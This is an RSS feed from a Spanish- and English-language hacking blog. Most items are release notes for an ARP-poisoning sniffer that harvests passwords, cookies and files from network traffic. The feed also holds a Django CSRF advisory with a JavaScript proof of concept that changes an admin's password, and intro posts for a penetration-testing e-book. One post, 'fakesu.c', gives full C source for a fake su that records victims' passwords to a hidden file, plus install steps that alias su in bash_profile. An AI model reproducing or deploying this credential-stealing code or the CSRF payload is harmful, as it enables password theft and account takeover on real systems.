<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
  <channel>
    <title>0hday.org</title>
    <link>http://www.0hday.org/</link>
    <description>0hday.org</description>
    <copyright>(c) 2007-2008 0hday.org</copyright>
        <pubDate>Wed, 23 Jul 2008 00:58:00 -0700</pubDate>
        <generator>http://www.textmotion.org</generator>
                <item>
        <title>Trapper 0.4 Released</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/28/trapper-0-4-released</guid>
        <link>http://www.0hday.org/blog/view/28/trapper-0-4-released</link>
        <description>Trapper 0.4 is ready and released, download it from:&#x3C;br /&#x3E;&#x3C;a  href=&#x22;http://nediam.com.mx/trapper&#x22;&#x3E;&#x3C;span&#x3E;http://nediam.com.mx/download.html&#x3C;/span&#x3E;&#x3C;/a&#x3E;&#x3C;br /&#x3E;Changelog:&#x3C;br /&#x3E;+ Enable/Disable promisc option added&#x3C;br /&#x3E;+ Lenght of the packet option added&#x3C;br /&#x3E;+ Time between ARP packets option added ( Poisoning time )&#x3C;br /&#x3E;+ Debug option added&#x3C;br /&#x3E;+ Gateway Detection&#x3C;br /&#x3E;+ Automatic Network Detection&#x3C;br /&#x3E;+ Firefox Cookie injector&#x3C;br /&#x3E;+ New MSN Sniffing ( based of sessions )&#x3C;br /&#x3E;+ VNC Sniffing&#x3C;br /&#x3E;+ SIP Sniffing&#x3C;br /&#x3E;+ TeamSpeak Sniffing&#x3C;br /&#x3E;+ FTP RETR file stealing&#x3C;br /&#x3E;+ Improves in Http Sniffing&#x3C;br /&#x3E;+ Http Base64 support&#x3C;br /&#x3E;+ Http Cpanel ports support&#x3C;br /&#x3E;+ Http Multipart Post Support&#x3C;br /&#x3E;+ Rewrite of SMTP sniffing&#x3C;br /&#x3E;+ SMTP Snarfing ( attachments )&#x3C;br /&#x3E;+ Some code clean ( working in all trapper rewrite )&#x3C;br /&#x3E;- Bad http regex matching with trapper.conf values&#x3C;br /&#x3E;- 2Wire check on poisoning loop fixed&#x3C;br /&#x3E;- Trapper died attemping to write the saving file, now it just warns the user&#x3C;br /&#x3E;- Couldn't sniff on 'lo' interface&#x3C;br /&#x3E;- IMAP output sniffing fixed&#x3C;br /&#x3E;&#x3C;br /&#x3E;And report any bugs!&#x3C;br /&#x3E;</description>
        <author>crypkey@0hday.org (crypkey)</author>
                <pubDate>Wed, 23 Jul 2008 00:58:00 -0700</pubDate>
      </item>
            <item>
        <title>Trapper 0.4 Videos</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/27/trapper-0-4-videos</guid>
        <link>http://www.0hday.org/blog/view/27/trapper-0-4-videos</link>
        <description>Well we have some videos of 0.4 trapper in action..&#x3C;br /&#x3E;&#x3C;br /&#x3E;http://nediam.com.mx/trapper/videos/vncsniffing.ogg&#x3C;br /&#x3E;http://nediam.com.mx/trapper/videos/cookieinjection.ogg&#x3C;br /&#x3E;&#x3C;br /&#x3E;Trapper 0.4 gonna be released someday this month &#x3C;img src=&#x22;http://www.0hday.org/media/emoticons/default/wink.png&#x22; width=&#x22;16&#x22; height=&#x22;16&#x22; /&#x3E;&#x3C;br /&#x3E;Any comments are good.. cya&#x3C;br /&#x3E;&#x26;amp;nbsp;</description>
        <author>crypkey@0hday.org (crypkey)</author>
                <pubDate>Tue, 03 Jun 2008 00:58:00 -0700</pubDate>
      </item>
            <item>
        <title>Trapper 0.4 on his way ;)</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/26/trapper-0-4-on-his-way</guid>
        <link>http://www.0hday.org/blog/view/26/trapper-0-4-on-his-way</link>
        <description>Bueno pues para q no digan que ya no se esta desarrollando, pues si estamos trabajando ya sobre la 0.4 de trapper que incluira:&#x3C;br /&#x3E;&#x3C;br /&#x3E;Https Sniffing&#x3C;br /&#x3E;MSN Sniffing basado en sessiones 100% stable ( sin uso de base de datos etc.. )&#x3C;br /&#x3E;SIP Sniffing&#x3C;br /&#x3E;Cisco Sniffing&#x3C;br /&#x3E;Cookie injector ( Bastante interesante )&#x3C;br /&#x3E;&#x3C;br /&#x3E;Y esperamos tambien meter:&#x3C;br /&#x3E;&#x3C;br /&#x3E;VNC Sniffing&#x3C;br /&#x3E;RTP Sniffing &#x3C;img  src=&#x22;http://www.zonartm.org/foro/Smileys/default/wink.gif&#x22; alt=&#x22;Wink&#x22; border=&#x22;0&#x22; /&#x3E;&#x3C;br /&#x3E;&#x3C;br /&#x3E;Aqui solo les dejo una screenshot del nuevo msn sniffing y pues lo demas, solo esperen =)&#x3C;br /&#x3E;&#x3C;br /&#x3E;http://img502.imageshack.us/img502/5812/newmsnsniffingwc6.png&#x3C;br /&#x3E;&#x3C;br /&#x3E;</description>
        <author>crypkey@0hday.org (crypkey)</author>
                <pubDate>Tue, 08 Apr 2008 15:24:33 -0700</pubDate>
      </item>
            <item>
        <title>Trapper 0.3.4</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/25/trapper-0-3-4</guid>
        <link>http://www.0hday.org/blog/view/25/trapper-0-3-4</link>
        <description>&#x3C;p&#x3E;New features:&#x3C;/p&#x3E;
&#x3C;p&#x3E;Fake Mac supported almost in every distro&#x3C;br /&#x3E;
FTP and POP3 passwd in different files&#x3C;br /&#x3E;
Host and path for HTTP sniffing&#x3C;br /&#x3E;
Installer added&#x3C;br /&#x3E;
Code cleanup&#x3C;br /&#x3E;
Stats added&#x3C;/p&#x3E;
&#x3C;p&#x3E;Bugs fixed:&#x3C;/p&#x3E;
&#x3C;p&#x3E;POP3 bad handling of multiple logins&#x3C;br /&#x3E;
Saving incorrectly irc private msgs&#x3C;br /&#x3E;
Killing incorrectly APR attack&#x3C;br /&#x3E;
Post in HTTP sniffing not detected correctly&#x3C;/p&#x3E;

Download: http://nediam.com.mx/trapper/download.html</description>
        <author>crypkey@0hday.org (crypkey)</author>
                <pubDate>Fri, 08 Feb 2008 16:05:53 -0800</pubDate>
      </item>
            <item>
        <title>Trapper 0.3.3</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/24/trapper-0-3-3</guid>
        <link>http://www.0hday.org/blog/view/24/trapper-0-3-3</link>
        <description>Small bug fixes:&#x3C;br /&#x3E;
&#x3C;br /&#x3E;
Sniffing after APR&#x3C;br /&#x3E;
Bad cookie saving.&#x3C;br /&#x3E;
&#x3C;br /&#x3E;
Download: http://nediam.com.mx/trapper/trapper-0.3.3.tar.gz</description>
        <author>crypkey@0hday.org (crypkey)</author>
                <pubDate>Wed, 16 Jan 2008 12:44:37 -0800</pubDate>
      </item>
            <item>
        <title>Trapper 0.3.2</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/23/trapper-0-3-2</guid>
        <link>http://www.0hday.org/blog/view/23/trapper-0-3-2</link>
        <description>Cosas nuevas:

- Verbose para IRC Sniffing
- Dirección MAC falsa (00:11:22:33:44:55 o aleatoria)
- Trapper.conf (para especificar parametros que se deseen sniffear via http, similar a la funcionalidad de Cain)
- Especificar ports en trapper.conf
- IRC chat sniffing

Bugs arreglados:

- Detección de la dirección IP local
- HTTP sniffing double value
- Install.pl, modulos faltantes
- Mostrando cookies en blanco

Download

&#x3C;a  href=&#x22;http://nediam.com.mx/trapper/trapper-0.3.2.tar.gz&#x22;&#x3E;Click HERE!&#x3C;/a&#x3E;

Any bugs report it to: &#x3C;a  href=&#x22;http://zonartm.org/foro&#x22;&#x3E;RTM Forums&#x3C;/a&#x3E;
or at crypkey@0hday.org, nediam@0hday.org, nahual@0hday.org</description>
        <author>crypkey@0hday.org (crypkey)</author>
                <pubDate>Thu, 10 Jan 2008 02:31:54 -0800</pubDate>
      </item>
            <item>
        <title>Trapper 0.3.1 released</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/22/trapper-0-3-1-released</guid>
        <link>http://www.0hday.org/blog/view/22/trapper-0-3-1-released</link>
        <description>We are currently working on https sniffing and smb downgrade sniffing, probably next release will include them &#x3C;img  src=&#x22;http://www.zonartm.org/foro/Smileys/default/wink.gif&#x22; alt=&#x22;Wink&#x22; border=&#x22;0&#x22; /&#x3E; w00t.

Improvements:
Http Sniffing
APR

Features:
Cookie sniffing
-v msn and cookie option

Bug Fixes:
Bad parsing on http sniffing

Download:

&#x3C;a  href=&#x22;http://nediam.com.mx/trapper/trapper-0.3.1.tar.gz&#x22;&#x3E;http://nediam.com.mx/trapper/trapper-0.3.1.tar.gz&#x3C;/a&#x3E;</description>
        <author>crypkey@0hday.org (crypkey)</author>
                <pubDate>Tue, 01 Jan 2008 03:32:55 -0800</pubDate>
      </item>
            <item>
        <title>Trapper 0.3 released</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/15/trapper-0-3-released</guid>
        <link>http://www.0hday.org/blog/view/15/trapper-0-3-released</link>
        <description>Bug Fixes:

- Install.pl
- Http Sniffing
- APR timing.
- Some other crappy fixes

Improvements:

- MSN Sniffing
- IRC Sniffing
- Http Sniffing
- APR attack

Any comments or bug reports go to: www.zonartm.org/foro

Download: &#x3C;a  href=&#x22;http://www.0hday.org/wp-content/uploads/trapper-03tar.gz&#x22; title=&#x22;Trapper 0.3&#x22;&#x3E;http://nediam.com.mx/trapper/trapper-0.3.tar.gz&#x3C;/a&#x3E; &#x3C;a  href=&#x22;http://www.0hday.org/wp-content/uploads/trapper-03tar.gz&#x22; title=&#x22;Trapper 0.3 released&#x22;&#x3E; &#x3C;/a&#x3E;</description>
        <author>crypkey@0hday.org (crypkey)</author>
                <pubDate>Wed, 12 Dec 2007 12:33:29 -0800</pubDate>
      </item>
            <item>
        <title>Django 0.96 vulnerability</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/14/django-0-96-vulnerability</guid>
        <link>http://www.0hday.org/blog/view/14/django-0-96-vulnerability</link>
        <description>Les paso el reporte de un fallo en django:

&#x3C;code&#x3E; &#x3C;/code&#x3E;Author: J. Carlos Nieto.
Date: Oct 21, 2007

There exists a security hole in the default django's admin panel.

Background
==========
Django is a high-level Python Web framework that encourages rapid  development and clean, pragmatic design.
Django has an automatic admin panel that allows a person with admin  privileges to modify the database tables, it allows to change any user  password too.
See more at &#x3C;a  href=&#x22;http://www.djangoproject.com/&#x22;&#x3E;http://www.djangoproject.com&#x3C;/a&#x3E;

Summary
=======
django has, by default, no CSRF protection, this may allow an attacker  to change any user password by tricking a victim with admin privileges  into a special forged web page (even in a a totally different server)  that sends a request to change the password of the user with id = n. The  victim does not know that the form was sent. If the victim has admin  privileges the exploit will succeed, otherwise nothing will happen.

Severity
========
Mild. This problem exists only with the default installation and can be  easily solved using a middleware found in here:  &#x3C;a  href=&#x22;http://www.djangoproject.com/documentation/csrf/&#x22;&#x3E;http://www.djangoproject.com/documentation/csrf/&#x3C;/a&#x3E;.

Proof of concept
================

window.onload = function() {
var url = &#x3C;a  href=&#x22;http://127.0.0.1:8000/admin/auth/user/1/password/&#x22;&#x3E;&#x22;http://127.0.0.1:8000/admin/auth/user/1/password/&#x22;&#x3C;/a&#x3E;;

var pass = &#x22;funky&#x22;;

var param = {
password1: pass,
password2: pass
};

var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';

for (var i in param) {
try {
// ie
var input = document.createElement('');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value',  param[i]);
form.appendChild(input);
}
document.body.appendChild(form);

form.submit();
}





Solution
========
Use the django's CSRF protection in all your applications. Take a look  at &#x3C;a  href=&#x22;http://www.djangoproject.com/documentation/csrf/&#x22;&#x3E;http://www.djangoproject.com/documentation/csrf/&#x3C;/a&#x3E;.


Disclosure Timeline
===================
2007.10.18 - Vulnerability found
2007.10.18 - Vulnerability reported to vendor
2007.10.18 - Vendor response, among other things: ...&#x22;it's not a  vulnerability unless you can somehow force the code into my browser&#x22;...
2007.10.21 - Advisory release

License
=======

Copyright 2007 J. Carlos Nieto

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.</description>
        <author>xiam@0hday.org (xiam)</author>
                <pubDate>Wed, 24 Oct 2007 09:10:33 -0700</pubDate>
      </item>
            <item>
        <title>Se libera la versión 0.1 de Trapper</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/13/se-libera-la-version-0-1-de-trapper</guid>
        <link>http://www.0hday.org/blog/view/13/se-libera-la-version-0-1-de-trapper</link>
        <description>Trapper es un sniffer que aparte tiene la modalidad de lanzar ataques de ARP Poison. Está escrito en Perl. El desarrollo de Trapper fue inspirado en la funcionalidad de &#x3C;a  href=&#x22;http://www.oxid.it/cain.html&#x22;&#x3E;Cain&#x3C;/a&#x3E;, pero como éste sólo funciona en Windows, quisimos hacer un programa que funcionara en Linux/Unix.  Lo pueden descargar de &#x3C;a  href=&#x22;http://nediam.com.mx/trapper/trapper-0.1.tar.gz&#x22;&#x3E;aquí&#x3C;/a&#x3E;.

Para cualquier bug report, comentarios, dudas etc.. pueden usar el foro de &#x3C;a  href=&#x22;http://zonartm.org/foro&#x22;&#x3E;RTM&#x3C;/a&#x3E;</description>
        <author>crypkey@0hday.org (crypkey)</author>
                <pubDate>Sat, 06 Oct 2007 18:20:46 -0700</pubDate>
      </item>
            <item>
        <title>fakesu.c</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/12/fakesu-c</guid>
        <link>http://www.0hday.org/blog/view/12/fakesu-c</link>
        <description>Hace poco tuve la necesidad de poner un fakesu, y la verdad los que encontre y los scripts eran demaciado intrusivos y no tenian mucha opcion, esta es una version muuy rapida de fakesu donde hacemos locking (la mayoria solo toma el primer password) con archivos y guardamos todo en /var/tmp/, recuerden de hacer alias su=/var/tmp/.su o algo asi.

Sin mas preambulo lo ponemos aqui, ya que la pagina se ve bastante muerta.

&#x3C;code class=&#x22;prettyprint&#x22;&#x3E;
/*
* fake-su.c
*
* fastly written by nahual
* god all the fakesu sucked
*
* Bastante sencillo:
*
* gcc -O2 -o .su fake-su.c
* mv .su /var/tmp/.su
* echo &#x22;alias su=/var/tmp/.su&#x22; &#x3E;&#x3E; ~/.bash_profile
* Y esperar ...
*
* El Nahual
*
* TODO:
* Agregar la posibilidad de que nos mande el password en un paquete UDP para logeo remoto.
*
*/&#x3C;/code&#x3E;

#include
#include
#include

#define SU &#x22;/bin/su&#x22;
#define PASSWD &#x22;/var/tmp/.passwd&#x22;
#define LOCK &#x22;/var/tmp/.su.lock&#x22;

extern char **environ;

int main(int argc, char **argv) {
char *pass;
char *user;
char *ruser;
FILE *inFile;

switch(argc) {
case 1:
user = &#x22;root&#x22;;
break;
case 2:
if(!strncmp(&#x22;-&#x22;, argv[1], 1)) {
user = &#x22;root&#x22;;
}
else {
user = argv[1];
}
break;
case 3:
user = argv[2];
break;
}

//Esta el lockfile ya le grabamos una vez, lo dejamos en paz
if((inFile = fopen(LOCK, &#x22;r&#x22;)) != NULL) {
unlink(LOCK);
argv[0] = SU;
execve(argv[0], argv, environ);
}

//Okas ahora lo ponemos en el file pero como tenemos &#x22;delay&#x22; vamos a grabarlo y luego hacer execle al su real

if((inFile = fopen(PASSWD, &#x22;a+&#x22;)) == NULL) {
execle(SU, SU, argv[1], argv[2], NULL, environ);
//Si definido DEBUG hablamos .. si no .. calladitos nos vemos mas bonitos
#ifdef DEBUG
perror(&#x22;open() on PASSWD file&#x22;);
#endif
}

//Okas agarramos el password ya
pass = getpass(&#x22;Password: &#x22;);

ruser = getenv(&#x22;USER&#x22;);
fprintf(inFile, &#x22;%s tried %s / %s\n&#x22;, ruser, user, pass);
fclose(inFile);

inFile = fopen(LOCK, &#x22;w&#x22;);
fclose(inFile);
printf(&#x22;su: Permission denied\nSorry\n&#x22;);

return 0;
}</description>
        <author>nahual@0hday.org (nahual)</author>
                <pubDate>Thu, 06 Sep 2007 12:23:28 -0700</pubDate>
      </item>
            <item>
        <title>Windows Hashes Repository</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/11/windows-hashes-repository</guid>
        <link>http://www.0hday.org/blog/view/11/windows-hashes-repository</link>
        <description>En conjunto con el staff de &#x3C;a target=&#x22;_blank&#x22;  href=&#x22;http://nediam.com.mx&#x22;&#x3E;nediam.com.mx&#x3C;/a&#x3E;,  se libera la versión 1.0 del sistema &#x3C;strong&#x3E;&#x22;Windows Hashes Repository&#x22;&#x3C;/strong&#x3E;. El objetivo de este proyecto es crear un repositorio con los hashes de Windows (LM y NT) de los password más comúnmente utilizados. Ustedes pueden alimentar al sistema con sus propios passwords; pueden introducirlos ya sea en texto plano o en hashes LM (LANMAN) o NT. Para el caso de texto plano, el sistema automáticamente calculará y desplegará los hashes. Si es por hashes, el sistema buscará en el repositorio y si encuentra dicho hash, desplegará la información asociada, y si no entonces se enviará a una fila de espera donde se intentará crackearlo utilizando rainbow tables. La página del sistema es: &#x3C;a target=&#x22;_blank&#x22; class=&#x22;con_linea&#x22;  href=&#x22;http://nediam.com.mx/winhashes/index.php&#x22;&#x3E;http://nediam.com.mx/winhashes/&#x3C;/a&#x3E;.

// Crypkey</description>
        <author>crypkey@0hday.org (crypkey)</author>
                <pubDate>Tue, 31 Jul 2007 23:18:19 -0700</pubDate>
      </item>
            <item>
        <title>Nuevo Staff!!!</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/10/nuevo-staff</guid>
        <link>http://www.0hday.org/blog/view/10/nuevo-staff</link>
        <description>Tenemos nuevo staff! asi que las cosas deben moverse un poco mas, sobre todo en la parte de Windows ya que el staff que estaba por algunos NDA no puede publicar mucho de lo mismo, pero ya vamos!&#x3C;br /&#x3E;
&#x3C;br /&#x3E;
Este fin de semana tendremos mas posts y tendremos mas proyectos, uno de los cuales es el primer framework de explotacion mexicano, a ver como nos va!&#x3C;br /&#x3E;
&#x3C;br /&#x3E;
//Nahual</description>
        <author>nahual@0hday.org (nahual)</author>
                <pubDate>Wed, 18 Jul 2007 19:14:04 -0700</pubDate>
      </item>
            <item>
        <title>Objetivos generales y convenciones del libro</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/6/objetivos-generales-y-convenciones-del-libro</guid>
        <link>http://www.0hday.org/blog/view/6/objetivos-generales-y-convenciones-del-libro</link>
        <description>En este pequeño capitulo veremos los objetivos generales asi como las convenciones del libro, aunque los objetivos queramos moderadamente claros dentro de la introduccion es importante que el lector los tenga muy claros para poder mantener una vision clara de lo que se busca en este libro

El objetivo principal del libro es que el lector tenga el conocimiento de las tecnicas tanto basicas como avanzadas de intrusion para asi poder hacer uso debido de las mismas en correspondencia con la etica individual del usuario final.

Otro objetivo es que el lector al final del libro tenga un framework de trabajo en donde pueda mantener un esquema completo de trabajo parecido a APenFra de Yaguarete Security.

&#x3C;!--more--&#x3E;

Dentro del libro veremos diferentes tipos de ejemplos, cuando se demuestre un codigo (que en general sera de python sin embargo podremos cambiar a C, perl, ensablador y lo requerido en cada capitulo) se vera de la siguietne manera:
&#x3C;pre&#x3E;&#x3C;code&#x3E; #!/usr/bin/env python #&#x3C;/code&#x3E;&#x3C;code&#x3E; &#x3C;/code&#x3E;&#x3C;code&#x3E;import sys import socket  class banner:    def __init__(self):       self.hola = &#x22;hola mundo&#x22;    def run(self):       print self.hola  if __name__ == &#x22;__main__&#x22;:    h = banner()    h.run() 

&#x3C;/code&#x3E;&#x3C;/pre&#x3E;
&#x3C;pre&#x3E;De la misma manera se veran ejemplos y movimientos de codigo. Buscamos una manera mas rapida y facil para mantener legible, comentarios son aceptados &#x3C;/pre&#x3E;</description>
        <author>nahual@0hday.org (nahual)</author>
                <pubDate>Mon, 29 Jan 2007 12:42:13 -0800</pubDate>
      </item>
            <item>
        <title>Introduccion a la serie de la &#x22;Enciclopedia Pentestica&#x22;</title>
                <guid isPermaLink="true">http://www.0hday.org/blog/view/3/introduccion-a-la-serie-de-la-qenciclopedia-pentesticaq</guid>
        <link>http://www.0hday.org/blog/view/3/introduccion-a-la-serie-de-la-qenciclopedia-pentesticaq</link>
        <description>&#x22;Hack con 0hday.org&#x22; es un proyecto que nacio de la posibilidad de poder hacer un framework de explotacion basico mientras se aprendia, nacio como la idea de un libro, sin embargo se hara como un libro electronico cada capitulo o tema añadido a este sitio.&#x3C;br /&#x3E;
&#x3C;br /&#x3E;
En los ultimos años han nacido frameworks de explotacion que han hecho el hacking mas facil, metasploit, CANVAS, IMPACT, etc. han hecho que la explotacion sea algo rapido y seguro, sin embargo se han perdido las ganas de aprender como funcionan las cosas, ya no hay textos explorando tenicas y como poder generarlas, ya que dia a dia las tecnicas se vuelven mas complejas y mas interesantes. Sin un &#x22;background&#x22; minimo el lector se pierde de excelentes libros como &#x22;Shellcoder's Handbook&#x22;, &#x22;Exploiting Software&#x22;, etc.&#x3C;br /&#x3E;
Esta serie (identificada como por la categoria de Enciclopedia Pentestica) nos adentrara en la posibilidad de aprender a&#x3C;br /&#x3E;
hacer nuestro propio framework de explotacion aprendiendo cada tecnica necesaria para el hackeo, con ejemplos y con la posibilidad de expandirlo conforme hayan mas capitulos y mas tecnicas.&#x3C;br /&#x3E;
&#x3C;br /&#x3E;
Esperamos que con esta serie los consultores de libro abierto que solo ejecutan metasploit y si no funciona lo explota lo marcan como debil aprendan y den un buen nombre a la seguridad y el hackeo etico.&#x3C;br /&#x3E;
&#x3C;br /&#x3E;
//Nahual</description>
        <author>nahual@0hday.org (nahual)</author>
                <pubDate>Sat, 13 Jan 2007 12:33:54 -0800</pubDate>
      </item>
            </channel>
</rss>
